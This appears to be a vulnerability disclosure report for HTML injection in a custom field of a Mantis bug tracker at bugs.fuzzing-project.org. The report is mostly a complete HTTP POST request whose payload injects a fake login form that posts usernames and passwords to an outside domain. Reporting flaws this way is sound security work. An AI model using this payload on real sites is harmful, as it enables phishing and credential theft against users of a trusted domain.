https://bugs.fuzzing-project.org/view_all_set.php?f=3
By not properly cleaning the information entered in the custom_field_7[]
field, an attacker could send emails to company customers, pointing to a legitimate fuzzing project domain where they are prompted for data, the possibility of successful phishing is excellent as the form is within the domain of the company.
This could be a form where information is requested and sent to an external domain
{F876158}
POST /view_all_set.php?f=3 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: https://bugs.fuzzing-project.org/
Cookie: MANTIS_secure_session=0;MANTIS_collapse_settings=|sidebar:1|filter:1;PHPSESSID=1495fp23866b0m12bi541et8c7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 1947
Host: bugs.fuzzing-project.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
category_id[]=0&custom_field_1[]=0&custom_field_2[]=0&custom_field_3[]=0&custom_field_4[]=0&custom_field_5[]=0&custom_field_6[]=0&custom_field_7[]=0'"()%26%25"'</td>--><div><div><div><div><h4><i></i>Inicio de sesión</h4><div></div><form id="login-form" method="post" action="https://www.dragonjar.org"><fieldset><label for="username" class="block clearfix"><span><input id="username" name="username" type="text" placeholder="Nombre de usuario" size="32" maxlength="191" value="" class="form-control autofocus"><i></i></span></label><label for="password" class="block clearfix"><span><input id="password" name="password" type="password" placeholder="Contraseña" size="32" maxlength="1024" class="form-control autofocus"><i></i></span></label><div></div><input type="submit" class="width-40 pull-right btn btn-success btn-inverse bigger-110" value="Iniciar sesión" /></fieldset></form></div>